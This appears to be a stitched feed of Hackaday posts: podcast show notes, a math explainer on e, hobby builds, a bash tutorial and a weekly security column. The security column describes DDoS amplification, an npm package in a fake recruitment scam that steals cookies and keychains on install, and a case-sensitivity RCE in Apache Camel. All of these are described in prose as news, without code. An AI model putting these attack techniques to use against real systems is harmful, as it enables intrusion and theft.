Hackaday Podcast Episode 312: Heart Attacks, the Speed of Light, and Self-balancing
Elliot does the podcast on the road to Supercon Europe, and Al is in the mood for math and nostalgia this week. Listen in and find out what they were reading on Hackaday this week.
The guys talked about the ESP-32 non-backdoor and battery fires. Then it was on to the hacks.
Self-balancing robots and satellite imaging were the appetizers, but soon they moved on to Kinect cameras in the modern day. Think you can’t travel at the speed of light? Turns out that maybe you already are.
Did you know there was a chatbot in 1957? Well, sort of. For the can’t miss stories: watches monitor your heart and what does the number e really mean?
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
html5-player.libsyn.com/embed/…
Download in DRM-free MP3 and stream it on the big speakers.
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 312 Show Notes:
News:
- The ESP32 Bluetooth Backdoor That Wasn’t
- Open Safety In The Auto Business: Renault Shares Its Battery Fire Suppression Tech
- Hackaday Europe 2025 Welcomes David Cuartielles, Announces Friday Night Bring-a-Hack
What’s that Sound?
- We had a ton of answers this week, and many of them were correct. It was a disposable film camera being wound and shot. Congratulations to [Bobby Tables] for getting the correct answer and winning the webcam-driven dice toss.
Interesting Hacks of the Week:
- Taming The Wobble: An Arduino Self-Balancing Bot
- PIDDYBOT – A Self Balancing Teaching Tool
- Building A Self-Balancing Robot Made Easy
- Self-balancing Arduino Does It Without An IMU
- Yet Another Self-Balancing Unicycle
- Self-balancing Robot Keeps Things On The Straight And Narrow
- en.wikipedia.org/wiki/Model_pr…
- github.com/kerrj/segway
- Satellite Imagery You Can Play With
- The Strange Afterlife Of The Xbox Kinect
- You Are Already Traveling At The Speed Of Light
- Lies, Damned Lies, And IGBT Datasheets
- Fictional Computers: EMERAC Was The Chatbot Of 1957
Quick Hacks:
- Elliot’s Picks:
- FlyingCam Is A Sweet DIY Webcam On A Stick
- How To Use LLMs For Programming Tasks
- Some Useful Notes On The 6805-EC10 Addressable RGB LED
- Al’s Picks:
- Classy Paper Tape Reader Complements Homebrew Retrocomputer
- What’s Wrong With This Antenna Tuner?
- Clock Mechanism Goes Crazy For Arduino
Can’t-Miss Articles:
- Pixel Watch 3’s Loss Of Pulse Detection: The Algorithms That Tell Someone Is Dying
- You Know Pi But Do You Really Know E?
hackaday.com/2025/03/14/hackad…
You Know Pi, But Do You Really Know E?
Pi Day is here! We bet that you know that famous constant to a few decimal points, and you could probably explain what it really means: the ratio of a circle’s circumference to its diameter. But what about the constant e? Sure, you might know it is a transcendental number around 2.72 or so. You probably know it is the base used for natural logarithms. But what does it mean?
The poor number probably needed a better agent. After all, pi is a fun name, easy to remember, with a distinctive Greek letter and lots of pun potential. On the other hand, e is just a letter. Sometimes it is known as Euler’s number, but Leonhard Euler was so prolific that there is also Euler’s constant and a set of Euler numbers, none of which are the same thing. Sometimes, you hear it called Napier’s constant, and it is known that Jacob Bernoulli discovered the number, too. So, even the history of this number is confusing.
But back to math, the number e is the base rate of growth for any continually growing process. That didn’t help? Well, consider that many things grow or decay through growth. For example, a bacteria culture might double every 72 hours. Or a radioactive sample might decay a certain amount per century.
Classic
The classic example is compound interest. Suppose you have $100, and you put it in the bank for a 10% per year return (please tell us where we can find that, by the way). So at the end of the year, we have $110, right? But what if you compound it every six months?
To figure that out, you look at the $100 after six months. The annual interest on the money is still $10, but we are only at 6 months, so prorated, that $5. Therefore, after six months, we have $105. At the end of the year, we look at the 10% of $105 ($10.50). That’s still for a year, so we need to halve it ($5.25) and add it in ($105+105.25=110.25). So, compounding every six months means we get an extra quarter compared to simple interest.
What if it was compounded monthly? Now, we divide our interest by 12, but we have a little more money every month. After the first month, we have $100.83 ($100.00 + 10/12). The second month’s net is $101.67. By the end of the year, you have $110.47. Not quite twice as much extra as you had before.
So what if you could compound weekly? Or daily? Or hourly? Generally, you’ll get more, at least up to a point. Eventually, the interest will be split up so much that it will balance the increase and, at that point, you won’t make any more. There is an upper limit to how much money we can have at the end of the year at 10%, no matter how often you compound the interest.
So Where’s e?
Assume you could get a 100% return on your money (definitely let us know how to do that). That means if you go for a year, that’s a return of 2 — you double your money. But if you split the year in half and compound, you get 2.25 times the original amount. You can try a few more splits, and you’ll find the equation for growth is (1+1/n)[sup]n[/sup]. That is, if you only compute it once (n=1), you get double (1+1). If you compute interest twice, you get 2.25 (that is, (1+1/2)[sup]2[/sup]).
If you set n to 1,000, the return will be 2.7169. That’s even better than 2.25. So 100,000 should be wildly better, right? Not so much. At 100,000 you get a 2.71814 return. At 10,000,000 the rate is 2.71828 (or so).
Look at those numbers. Going from 1,000 to 10,000,000 only increases yield by about 0.001. If you know calculus, you might know how to take the limit of the growth equation. If not, you can still see it is going to top off at around 2.718. Those are the first digits of e.
Of course, e is like pi — transcendental — so you can’t ever get all the digits. You just keep getting closer and closer to the actual value. But 2.718 is pretty close for practical purposes.
Scaling
We can scale e to whatever problem we have at hand. We just have to be mindful of the starting amount, the rate, and what a time period means. For example, to work with our 10% rate (instead of 100%) we have to consider the rate e0.10 or about 1.105. Then, to scale for amounts, we have to multiply by the rate. So remember our $100 at 10% example? Our maximum return is 100 x 1.105 = 110.50. Why did we only get $110.47? Because we compounded 12 times. The $110.50 result is the maximum.
More Years
You can also multiply the rate by the number of periods. So if we left the money in for five years: 100 x e(0.10 x 5). If you think about it, then, making 50% for one year has the same maximum as making 10% for 5 years (or 25% for 2 years).
Negative Growth?
Suppose you have 120 grams of some radioactive material that decays at a rate of 50% per year. How much will be left after three years? Simplistically, it seems like the answer is that it will be depleted after two years. But that’s not true.
Just as compounding adds more money, a decay rate removes some of the radioactive material, meaning the absolute decay rate gets slower and slower with time because it is a percentage of the radioactive material’s mass.
Just for the sake of an example, suppose at some imaginary small period, the sample is at 100 grams and, thus, the decay rate is 50 grams/year. Later, the sample is at 80 grams. The decay rate is 40 grams/year, so it will take longer to go from 80 to 60 than it did to go from 100 to 80.
In this case, the rate is negative, so the formula will be 120 x e[sup](-0.5 x 3)[/sup]. That means you will have about 26.8 grams of radioactive material left in three years.
Modeling
Consider the classic equation for an RC circuit: Vc=Vs(1-e[sup](-t/(RC))[/sup]). Here, Vc is the capacitor voltage, Vs is the supply voltage, t is in seconds, and RC is the product of the resistance in ohms and the capacitance in farads.
What can we infer from this? Well, you could also write this as: Vc=Vs-Vs x e[sup](-t/(RC))[/sup]. Looking at our earlier model for money, it is plain that Vs is the voltage we start with, t is the time, and rate is -1/RC (time can’t be negative, after all). That makes sense because RC is the time constant in seconds, so 1/RC is the rate per second. The formula tells us how much voltage is charged in the capacitor, and subtracting that from Vs gives us the voltage drop across the capacitor.
Think about this circuit:
At t=0, we have Vs(1-e0), which is 0. At t=0.5, the voltage should be about 7.86V; at t=1, it should be up to 10.57V. As you can see, the simulation matches the math well enough.
Discharging is nearly the same: Vc=V0 x e[sup](-t/(RC))[/sup]. Obviously, V0 is the voltage you started with and, again -1/RC is the rate.
So Now You Know!
There’s a common rule of thumb that after a time period (RC) a capacitor will charge to about 63% or discharge to about 37%. Now that you know the math, you can see that e[sup]-1[/sup]=0.37 and 1-e[sup]-1[/sup]=0.63. If you want to do the actual math, you can always set up a spreadsheet.
Anything that grows or shrinks exponentially is a candidate for using an equation involving e. That’s why it is a common base for logarithms. Of course, most slide rules use logarithms, but not all of them do.
(Title image showing e living in pi’s shadow adapted from “Pi” by [Taso Katsionis] via Unsplash.)
Utah’s FORGE: a Research Laboratory For Enhanced Geothermal Systems
Geothermal heat is a tantalizing source of energy that’s quite literally right below our feet. At the same time geothermal energy is hard to develop as the Earth’s crust is too thick in most places, limiting this to areas where magma is close enough to the surface and the underground rock permeable enough for water. The Utah FORGE facility is a field site were researchers are developing and testing ways to increase the scope of geothermal energy.
An Enhanced Geothermal System (EGS) is designed to be capable of using geothermal energy where this is normally not feasible through a technique that’s reminiscent of the hydraulic fracturing (‘fracking’) used by the oil and gas industry, but rather than creating more fractures, it instead uses hydro-shearing to prop open existing fractures and thus create the through-flow of water needed to extract geothermal energy.
So far FORGE has reported the successful creation of a geothermal reservoir where before there was none. This facility is located in the Milford valley in southwest Utah, which has some hydrothermal activity at the nearby Roosevelt Hot Springs, but through EGS other parts of this valley and similar areas could conceivably be used for generating electricity and for community heating as well. In a 2024 study by University of Utah scientists, it is described how the Milford valley’s volcanic past has left a large body of magma below a thick barrier of granitic rock that could provide access to geothermal resources with EGS to create the requisite fluid permeability.
FORGE is not the only facility working on EGS, but many other sites around the world having ceased activities after issues ranging from induced seismicity, susceptibility to earthquakes and budget shortages. Much like fracking, EGS is likely to cause earthquakes. Whether EGS can be made economically feasible still remains to be seen.
This Week in Security: The X DDoS, The ESP32 Basementdoor, and the camelCase RCE
We would be remiss if we didn’t address the X Distributed Denial of Service (DDoS) attack that’s been happening this week. It seems like everyone is is trying to make political hay out of the DDoS, but we’re going to set that aside as much as possible and talk about the technical details. Elon made an early statement that X was down due to a cyberattack, with the source IPs tracing back to “the Ukraine area”.
The latest reporting seems to conclude that this was indeed a DDoS, and a threat group named “Dark Storm” has taken credit for the attack. Dark Storm does not seem to be of Ukrainian origin or affiliation.
We’re going to try to read the tea leaves just a bit, but remember that about the only thing we know for sure is that X was unreachable for many users several times this week. This is completely consistent with the suspected DDoS attack. The quirk of modern DDoS attacks is that the IP addresses on the packets are never trustworthy.
There are two broad tactics used for large-scale DDoS attacks, sometimes used simultaneously. The first is the simple botnet. Computers, routers, servers, and cameras around the world have been infected with malware, and then remote controlled to create massive botnets. Those botnets usually come equipped with a DDoS function, allowing the botnet runner to task all the bots with sending traffic to the DDoS victim IPs. That traffic may be UDP packets with spoofed or legitimate source IPs, or it may be TCP Synchronization requests, with spoofed source IPs.
The other common approach is the reflection or amplification attack. This is where a public server can be manipulated into sending unsolicited traffic to a victim IP. It’s usually DNS, where a short message request can return a much larger response. And because DNS uses UDP, it’s trivial to convince the DNS server to send that larger response to a victim’s address, amplifying the attack.
Put these two techniques together, and you have a botnet sending spoofed requests to servers, that unintentionally send the DDoS traffic on to the target. And suddenly it’s understandable why it’s so difficult to nail down attribution for this sort of attack. It may very well be that a botnet with a heavy Ukrainian presence was involved in the attack, which at the same time doesn’t preclude Dark Storm as the originator. The tea leaves are still murky on this one.
That ESP32 Backdoor
As Maya says, It Really Wasn’t a backdoor. The Bleeping Computer article and Tarlogic press release have both been updated to reflect the reality that this wasn’t really a backdoor. Given that the original research and presentation were in Spanish, we’re inclined to conclude that the “backdoor” claim was partially a translation issue.
The terminology storm set aside, what researchers found really was quite interesting. The source of information was official ESP32 binaries that implement the Bluetooth HCI, the Host Controller Interface. It’s a structured format for talking to a Bluetooth chip. The official HCI has set aside command space for vendor-specific commands. The “backdoor” that was discovered was this set of undocumented vendor-specific commands.
These commands were exposed over the HCI interface, and included low-level control over the ESP32 device. However, for the vast majority of ESP32 use cases, this interface is only available to code already running on the device, and thus isn’t a security boundary violation. To Espressif’s credit, their technical response does highlight the case of using an ESP32 in a hosted mode, where an external processor is issuing HCI commands over something like a serial link. In that very narrow case, the undocumented HCI commands could be considered a backdoor, though still requires compromise of the controlling device first.
All told, it’s not particularly dangerous as a backdoor. It’s a set of undocumented instructions that expose low-level functions, but only from inside the house. I propose a new term for this: a Basementdoor.
The Fake Recruitment Scam
The fake recruitment scam isn’t new to this column, but this is the first time we’ve covered a first-hand account of it. This is the story of [Ron Jansen], a freelance developer with impressive credentials. He got a recruiter’s message, looking to interview him for a web3 related position. Interviews often come with programming tasks, so it wasn’t surprising when this one included instructions to install something from Github using npm and do some simple tasks.
But then, the recruiter and CTO both went silent, and [Ron] suddenly had a bad feeling about that npm install command. Looking through the code, it looked boring, except for the dependency NPM package, process-log. With only 100-ish weekly downloads, this was an obvious place to look for something malicious. It didn’t disappoint, as this library pulled an obfuscated blob of JSON code and executed it during install. The deobfuscated code establishes a websocket connection, and uploads cookies, keychains, and any other interesting config or database files it can find.
Once [Ron] new he had been had, he started the infuriating-yet-necessary process of revoking API keys, rotating passwords, auditing everything, and wiping the affected machine’s drive. The rest of the post is his recommendations for how to avoid falling for this scam yourself. The immediate answer is to run untrusted code in a VM or sandbox. There are tools like Deno that can also help, doing sandboxing by default. Inertia is the challenge, with a major change like that.
Camel CamelCase RCE
Apache Camel is a Java library for doing Enterprise Integration Patterns. AKA, it’s network glue code for a specific use case. It sends data between endpoints, and uses headers to set certain options. One of the important security boundries there is that internal headers shouldn’t be set by outside sources. To accomplish that, those headers are string compared with Camel and org.apache.camel as the starting characters. The problem is that the string comparison is exact, while the header names themselves are not case sensitive. It’s literally a camelCase vulnerability. The result is that all the internal headers are accessible from any client, via this case trickery.
The vulnerability has been fixed in the latest release of Camel. The seriousness of this vulnerability depends on the component being connected to. Akamai researchers provided a sample application, where the headers were used to construct a command. The access to these internal values makes this case an RCE. This ambiguity is why the severity of this vulnerability is disputed.
Bits and Bytes
Researchers at Facebook have identified a flaw in the FreeType font rending library. It’s a integer underflow leading to a buffer overflow. An attacker can specify a very large integer value, and the library will add to that variable during processing. This causes the value to wrap around to a very small value, resulting in a buffer much too small to hold the given data. This vulnerability seems to be under active exploitation.
We don’t normally see problems with a log file leading to exploitation, but that seems to be the situation with the Below daemon. The service runs as root, and sets the logfile to be world readable. Make that logfile a symlink to some important file, and when the service starts, it overwrites the target file’s permissions.
Microsoft’s Patch Tuesday includes a whopping six 0-day exploits getting fixed this month. Several of these are filesystem problems, and at least one is an NTFS vulnerability that can be triggered simply by plugging in a USB drive.
The ruby-saml library had a weird quirk: it used two different XML parsers while doing signature validations. That never seems to go well, and this is not any different. It was possible to pack two different signatures into a single XML document, and the two different parsers would each see the file quite differently. The result was that any valid signature could be hijacked to attest as any other user. Not good. An initial fix has already landed, with a future release dropping one of the XML parsers and doing a general security hardening pass.
ClockworkPi Unveils New PicoCalc Handheld
Do you like scientific calculators? Don’t bother answering that question, you’re reading Hackaday so we already know the answer. We also know you’re a fan of building things yourself and open source, which makes us fairly sure you’ll be just as interested in the recently announced ClockworkPi PicoCalc as we are.
On the surface, it looks like a chunky scientific calculator, though on further inspection you’ll note it comes equipped with a QWERTY keyboard. But open up the case and what you’ve really got is an elaborate carrier board for the Raspberry Pi Pico. The PicoCalc supports all variants of the microcontroller, but realistically we can’t think of any reason that you wouldn’t just use the latest version.
Everything is housed in an injection molded case, but the project page says all the necessary CAD files will be eventually be released under the GPL v3 so you can 3D print or CNC your own enclosure. For now though, the only thing of note that seems to be in the PicoCalc GitHub repository is a PCB schematic.
The software side of things is a little less clear. The page mentions a BASIC interpreter, MP3 playback, and support for various programming languages, but we get the impression that’s just a list of stuff you can run on the Pi Pico. There are a few images that clearly show the PicoCalc actually being used as a calculator however, so there may be an official firmware yet to be revealed.
The PicoCalc kit is on sale now, and will set you back $75 USD — which actually includes a first-generation Pi Pico, on the off chance that you don’t already have a few laying around. We’ve been impressed with the previous offerings from ClockworkPi, so assuming this new kit maintains that same build quality, it seems like a fair enough price.
The Trials and Tribulations of Building a Pasta Display
We love unique displays here at Hackaday. If you can figure out how to show information on some weird object, we’re all about it. So when [Julius Curt] wrote in to share his work on the Pasta Analog Display, we were hooked from the subject line.
But in reading his account, it ended up being even better than we hoped for. Because it turns out, getting pasta to behave properly in an electromechanical device is trickier than you might think. Oh sure, as [Julius] points out, those ridges on the side of penne might make them look like gears — but after spending the time and effort to build a particularly slick 3D printed frame to actually use them as such, it turns out they just won’t cooperate. You’d think the pasta makers of the world would have some respect for mechanical tolerances, but unfortunately not.
So if [Julius] couldn’t use the natural shape of the penne to get them to rotate, what was the alternative? First, he switched to the far larger cannelloni. Their increased internal volume, most commonly used to hold spinach and ricotta, has in this case been stuffed with a 3D printed armature. Thus each cannelloni is physically attached to a gear, which means when one of them is rotated by a 28BYJ-48 stepper motor, the rest follow.
All that’s left is to apply some artwork to the pasta (again, easier said than done), and rotate them into position. Depending on how much you can cram onto each cannelloni, the display can be rotated to show several different messages. In the video below, [Julius] shows off three distinct images rendered at the push of a button.
If you get hungry while trying to turn pasta into a workable display medium, you can always cook and eat some of your building materials. Luckily, a couple years ago Barilla released the design for an open source device to help you cook their pasta more efficiently.
youtube.com/embed/mlT0Z5JhcTU?…
Una PE in Microsoft Windows sfruttata da 2 anni Nel Patch Tuesday. Aggiornare avverte CISA e ACN
All’interno del Patch Tuesday di marzo è stata inclusa la CVE-2025-24983, una Vulnerabilità di elevazione dei privilegi del sottosistema kernel Win32 di Microsoft Windows.
La Cybersecurity and Infrastructure Security Agency (CISA) ha aggiunto due nuove vulnerabilità al suo catalogo delle vulnerabilità note sfruttate, una delle quali è il CVE-2025-24983, il quale risulta sfruttato attivamente dagli attaccanti. Stessa cosa ha fatto lo CSIRT dell’Agenzia della cybersicurezza nazionale ACN con un bollettino specifico che comprende anche questa CVE.
Secondo l’azienda di sicurezza informatica ESET, che ha scoperto e segnalato la vulnerabilità, gli aggressori sfruttano questa falla in natura da marzo 2023, rendendola uno degli exploit attivi più longevi prima della correzione.
Il bug di sicurezza è presente nel sottosistema del kernel Win32 di Windows ed è stata classificata come debolezza di tipo use-after-free (UAF) che consente agli aggressori con privilegi bassi di elevare i privilegi a quelli di SYSTEM senza richiedere l’interazione dell’utente.
Nonostante il suo impatto significativo, Microsoft ha classificato la vulnerabilità come “Importante” anziché “Critica” a causa dell’elevata complessità dello sfruttamento, che richiede agli aggressori di trovarsi di fronte ad una race condition.
“La vulnerabilità è un tipo di vulnerabilità use-after-free nel driver Win32k”, ha spiegato ESET nella sua analisi tecnica. In un certo scenario ottenuto utilizzando l’API WaitForInputIdle, la struttura W32PROCESS viene dereferenziata una volta in più del dovuto, causando UAF.”
Il ricercatore ESET Filip Jurčacko, che ha scoperto l’exploit, ha scoperto che questo veniva diffuso tramite una backdoor sofisticata nota come PipeMagic.
L'articolo Una PE in Microsoft Windows sfruttata da 2 anni Nel Patch Tuesday. Aggiornare avverte CISA e ACN proviene da il blog della sicurezza informatica.
The Mysterious and Important Work of Prop Design on Severance
Have you seen Severance? Chances are good that you have; the TV series has become wildly popular in its second season, to the point where the fandom’s dedication is difficult to distinguish from the in-universe cult of [Kier]. Part of the show’s appeal comes from its overall aesthetic, which is captured in this description of the building of one of the show’s props.
A detailed recap of the show is impossible, but for the uninitiated, a mega-corporation called Lumon has developed a chip that certain workers have implanted in their brains to sever their personalities and memories into work and non-work halves. The working “Innies” have no memory of what their “Outies” do when they aren’t at work, which sounds a lot better than it actually ends up being. It’s as weird as it sounds, and then some.
The prop featured here is the “WoeMeter” from episode seven of season two, used to quantify the amount of woe in a severed worker — told you it was weird. The prop was built by design house [make3] on a short timeline and after seeing only some sketches and rough renders from the production designers, and had to echo the not-quite-midcentury modern look of the whole series. The builders took inspiration from, among other things, a classic Nagra tape recorder, going so far as to harvest its knobs and switches to use in the build. The controls are all functional and laid out in a sensible way, allowing the actors to use the device in a convincing way. For visual feedback, the prop has two servo-operated meters and a string of seven-segment LED displays, all controlled by an ESP-32 mounted to a custom PCB. Adding the Lumon logo to the silkscreen was a nice touch.
The prop maker’s art is fascinating, and the ability to let your imagination run wild while making something that looks good and works for the production has got to be a blast. [make3] really nailed it with this one.
Thanks to [Aaron’s Outie] for the tip.
Tracking Deep-Sky Objects
Astrophotography, and astronomy in general, takes some fairly specialized tools and a high amount of precision. Setting up the equipment can also take a lot of time, especially for amateurs traveling to various locations with their equipment, so anything that can reduce the amount of time spent looking for objects and increasing the amount of time looking at them is a welcome addition, especially since nights where conditions are ideal for these activities can be rare. [Anton] developed this real-time tracking tool for deep sky objects (DSOs) to keep tabs on most of the interesting things out there a telescope can be pointed at.
[Anton] calls his tool the Nova DSO Altitude Tracker and gets its information from SIMBAD, updating every minute for a given location on the planet. With that location data, the program calculates altitude and azimuth for various objects and also helps the user keep track of other important variables like moon illumination and angle above the horizon. It also allows the user to highlight specific objects of interest, making sure they are front and center throughout the session. Each DSO can be selected from a list to display detailed information about it such as its path, time visible in the sky, and other properties.
To get the program running, essentially all that’s required is a computer capable of running Python and a display of some sort. From there it provides a quick view of the best objects to point one’s telescope or camera at without any guesswork. With all of the code available it shouldn’t be too much of a leap to do other things with the underlying software, either, such as tying it into a tracker of some sort like this DIY telescope tracking device we featured a while back.
BritCSS: Write CSS With British English Spellings
Everyone knows that there is only one proper English, with the rest being mere derivatives that bastardize the spelling and grammar. Despite this, the hoodlums who staged a violent uprising against British rule in the American colonies have somehow made their uncouth dialect dominant in the information technologies that have taken the world by storm these past decades. In this urgent mission to restore the King’s English to its rightful place, we fortunately have patriotic British citizens who have taken it upon themselves to correct this grave injustice. Brave citizens such as [Declan Chidlow], whose BritCSS project is a bright beacon in these harrowing times.
Implemented as a simple, 14 kB JavaScript script to be included in an HTML page, it allows one to write CSS files using proper spelling, such as background-colour and centre. Meanwhile harsh language such as !important is replaced with the more pleasant !if-you-would-be-so-kind. It is expected that although for now this script has to be included on each page to use BritCSS, native support will soon be implemented in every browser, superseding the US dialect version. [Declan] has also been recommended to be awarded the Order of the British Empire for his outstanding services.
Have Li-ion Batteries Gone Too Far?
The proliferation of affordable lithium batteries has made modern life convenient in a way we could only imagine in the 80s when everything was powered by squadrons of AAs, or has it? [Ian Bogost] ponders whether sticking a lithium in every new device is really the best idea.
There’s no doubt, that for some applications, lithium-based chemistries are a critically-enabling technology. NiMH-based EVs of the 1990s suffered short range and slow recharge times which made them only useful as commuter cars, but is a flashlight really better with lithium than with a replaceable cell? When household electronics are treated as disposable, and Right to Repair is only a glimmer in the eye of some legislators, a worn-out cell in a rarely-used device might destine it to the trash bin, especially for the less technically inclined.
[Bogost] decries “the misconception that rechargeables are always better,” although we wonder why his article completely fails to mention the existence of rechargeable NiMH AAs and AAAs which are loads better than their forebears in the 90s. Perhaps even more relevantly, standardized pouch and cylindrical lithium cells are available like the venerable 18650 which we know many makers prefer due to their easy-to-obtain nature. Regardless, we can certainly agree with the author that easy to source and replace batteries are few and far between in many consumer electronics these days. Perhaps new EU regulations will help?
Once you’ve selected a battery for your project, don’t forget to manage it if it’s a Li-ion cell. With great power density, comes great responsibility.
Got Junk? Then Build This Scrappy TEA Laser
A piece of glass, some bits of tinfoil, a sheet of plastic, a couple of razor blades, and a few assorted bits and bobs are all it takes to build this TEA nitrogen laser. Oh, and a 5,000-volt flyback supply with enough amperage to stop your heart. You’ll need that too.
Seriously, if you choose to follow [MultiverseCurator] ‘s example and build this laser, you’ll want to take the proper precautions. A transversely excited atmospheric laser is simple in concept, but there are plenty of ways for them to go wrong. Unlike the gas lasers used in laser cutters, there’s no enclosed resonator cavity or mirrors. Rather, the excitation takes place across a narrow gap between two electrodes, using atmospheric nitrogen as the lasing medium. This results in hard UV emissions, which means you can’t see them with the naked eye. Add to that the spark gap creating extremely loud discharges as the laser operates, and hazards abound. Proceed with caution.
Construction starts with a flat glass plate and a pair of large capacitors made from aluminum foil plates separated by a plastic dielectric. The razor blades are connected across the capacitors, separated by a narrow gap, with an inductor made from magnet wire in parallel. A spark gap made from nuts and bolts goes in series, and the whole assembly gets connected to a high-voltage power supply — [Multiverse] used a ZVS driver and a CRT flyback transformer with an eight-megohm resistor in series. The video below has all the build details.
It’ll take a little fiddling to get it lasing, and you’ll need something phosphorescent to see the UV light — a scrap of copy paper should do. But the results are pretty amazing for something made from scrap. If you want to take the design to the next level, you’ll want to check out [Les Wright]’s TEA laser build.
youtube.com/embed/uLyVpYIYT1E?…
Linux Fu: Use the Source (Command), Luke
You can argue if bash is a good programming language or not, but you can’t argue that it is a programming language. However, there are a few oddities about it that make it different from most other languages you probably know. For one thing, variables are dynamically scoped. Second, you can easily change variables in an upper scope. This leads to a problem when you want to do something like reset your path:
#!/bin/bash
#: This does NOT work
PATH=/usr/bin:/bin
Well, actually, it does work; it just doesn’t work the way you imagine it might. The key is to realize that when you execute our script (say, resetpath), a new copy of bash runs. It inherits all the variables from your shell. Now the script sets PATH for the new copy of bash. Anything else you run in that script will see your change. But when the script exits, the new copy of bash is gone and the old copy sees the same old PATH it always did.
Sometimes, this is a benefit, similar to “call by value” in other languages. However, what if you want to influence things? What’s more is that the situation is just the opposite within bash functions. For example:
#!/bin/bash
b() {
echo B: $x
x=200
}
a() {
x=100
b
echo A: $x
}
a
#: output
#: B: 100
#: A: 200
Function b has no difficulty reading and even setting variable x.
The Answer, Of Source Course
The answer to the first problem is to use the source command (which can be either the word source or a single period). This tells bash to avoid running a new interpreter and just pretend you’d entered all the lines in a file from the console.
This is great sometimes. Our resetpath script will actually work just fine with either of these commands:
source resetpath
. resetpath
You don’t even need the #! line, although it doesn’t hurt. However, there are a few problems.
The Catches
First, if you exit, then you exit the entire shell, not something you probably meant to do. Second, you wind up polluting the variable space of the parent. For example, if your script creates a function X, with a regular shell script, that function goes away as soon as your script stops. With a source script, function X now will live forever unless you do something about it.
Neither of these problems are insurmountable, of course, and you’ll see a few ways to address it in the example code in this post.
A Simple Example
If you spend a lot of time on the command line, you might want to have shortcut names for directories. What’s more, you might want to execute a little script when you go to particular directories or even when you leave them.
My plan is to keep a simple file in ~/.proj_dirs. To keep things simple, I’m assuming you can figure out the bash format:
PROJ_DIRS["docs"]="~/library/documents"
PROJ_DIRS["video"]="~/library/videos"
PROJ_DIRS["arduino"]="/home/alw/projects/embedded/Arduino"
. . .
The eventual goal is to replace the cd command (or, at least, allow for that). However, it would be a pain to have to write something like “source pcd arduino” every time.
The Alias Solution
The answer is pretty simple. You can create a script that can install itself as an alias. Here’s the basic flow:
#!/bin/bash
#: This is not a bash shell script
#: But needs to be sourced. However...
#: Try:
#: eval $(__project_dir.sh --__install project_dir)
if [ "$1" == "--__install" ] # this should only be called from "real" script
then
aname="$2"
if [ "$aname" == "" ]
then
aname="pcd"
fi
echo -n "alias '$aname'='source "
aname=$(realpath -s "$0")
echo "$aname'"
exit 0
fi
#: Your source script goes here
...
The idea is that if you run as a regular script with –__install, it returns the alias command. You can then eval that in, for example, a startup script (like .bashrc or .profile), and then you’ll have the alias you want. By default, the code uses pcd, although you can set up any name you like on the command line. You could even create an alias for cd if you wanted to do that.
Why Not Automatic?
You could, of course, detect if you were running normally or as a source automatically. Turns out this is somewhat finicky across shells, although if you are sure you are always using real bash, it is feasible. For example:
if [[ "${BASH_SOURCE[0]}" == "$0" ]]
then
echo I am not sourced!
fi
Variables
Once you have the basic framework, it is easy to write the scripts to read the “database” (also using source) and do the actual work. However, there is a slight problem. Once you produce all the variables you need to do the work, it leaves all that pollution in your shell’s namespace.
Of course, you could write a function to clean up everything you use, but that’s a pain and error prone, too. A better idea is to write your code in a bash function. Then you can use local variables that will go away when the function returns. That leaves you with just your function to clear up with unset.
That leads to this simple framework:
#!/bin/bash
if [[ "${BASH_SOURCE[0]}" == "$0" ]]
then
if [ "$1" == "--__install" ] # this should only be called from "real" script
then
aname="$2"
if [ "$aname" == "" ]
then
aname="pcd" # default alias name
fi
echo -n "alias '$aname'='source "
aname=$(realpath -s "$0")
echo "$aname'"
exit 0
fi
echo "You must source this script"
exit 1
fi
#: Ok your script goes here
main() {
. . .
}
#: Be sure to have this at the end
#: Actually named with underscores in the real code
#: But that upsets the rendering in browser
#: Actual code at gist.github.com/wd5gnr/c5681f2…
go() {
local tmprv
main "$@"
tmprv=$?
unset main, go
return $tmprv
}
go "$@"
return $?
The very bottom calls the go function, which calls your main function. Then the go function destroys your main function and itself. If you create new functions that you don’t want to keep around, you’ll need to destroy them yourself. Besides, you might be creating functions you want to keep, so the framework can’t decide.
The Whole Thing
You can find the entire example on GitHub. Outside of the management of the alias and the variable scope, the script is unremarkable. Note the optional scripts in the directories (.dir_enter and .dir_exit) are sourced also, so they only need to be readable (-r) not executable (-x).
The only other nuance is that if you enter anything as a directory that the program doesn’t recognize, it assumes it is an actual directory, so you can use this to replace the cd command entirely if you want.
Since the script can tell if it is sourced or not, it is possible to start in the source mode and then call yourself as a normal script to do work where that makes more sense. As usual with bash, there are lots of possibilities.
We talk about bash programming a lot around here. Debugging can be helpful, although they haven’t packaged the debugger for newer versions of bash lately.
Hacking a Rotary Phone
[Yaymukund] made an interesting observation. Old-style rotary phones were made to last and made for service. Why? Because you didn’t own them, the phone company did. There was no advantage for them for you to need a service call or a new phone. Of course, many of these old phones are still hanging around like the GPO 746 that appears in the post.
What do you do with an old rotary phone? In this case, you make it play a random tune whenever someone picks up the handset. As you might expect, you don’t need much of the original phone to do this. In particular, you need the handset receiver and the switch hook. We’d have liked to read the dial to select a tune, but perhaps that could be in version two.
All the components wire back to a D92732 circuit board. Finding the right wires was a bit finicky, but eventually, a Teensy, a battery pack, and an audio breakout board were in place. The rest is mostly trivial.
[Yaymukund] spent about £300, but over half of that was on tools most Hackaday readers will already have. The phone itself was £65. You can use these phones as a basis for many projects. Even if you want to go mobile.
Hackaday Europe 2025: Speaker Schedule and Official Event Page
Hackaday Europe 2025 is just days away, and we’ve got the finalized speaker schedule hot off the digital press. We’re also pleased to announce that the event page is now officially live, where you can find all the vital information about the weekend’s festivities in one place.
Whether you’ll be joining the fun in Berlin, or watching the live stream from home, we’ve got a fantastic lineup of speakers this year who are eager to tell us all about the projects that have been keeping them up at night recently:
Saturday Schedule
Registration and Breakfast
9:00 – 10:00
Opening Remarks
10:00 – 10:20
What if the Future [of Electronics] was Compostable?
10:30 – 11:20 (Keynote)
David Cuartielles
Manufacturing the Hackaday Supercon Badge
11:30 – 11:50
Giovanni Salinas
Seeing Through Silicon with IRIS (InfraRed, in-situ) Imaging
12:00 – 12:20
Bunnie Huang
Lunch
12:30 – 13:30
Developing a NFC Based Decentralized Payment System
13:30 – 13:50
Daniel Büchele & Andre Zibell
Hacking a Pinball Machine
14:00 – 14:40
Daniel Dakhno
Hardware Startup / Product Pitfalls
14:50 – 15:30
Sera Evcimen
Creating Light Sculptures for Fun and…Mostly for Fun
15:40 – 16:00
Erik Bosman
The Core64 – NeonPixels – 65uino Collaboration
16:10 – 16:50
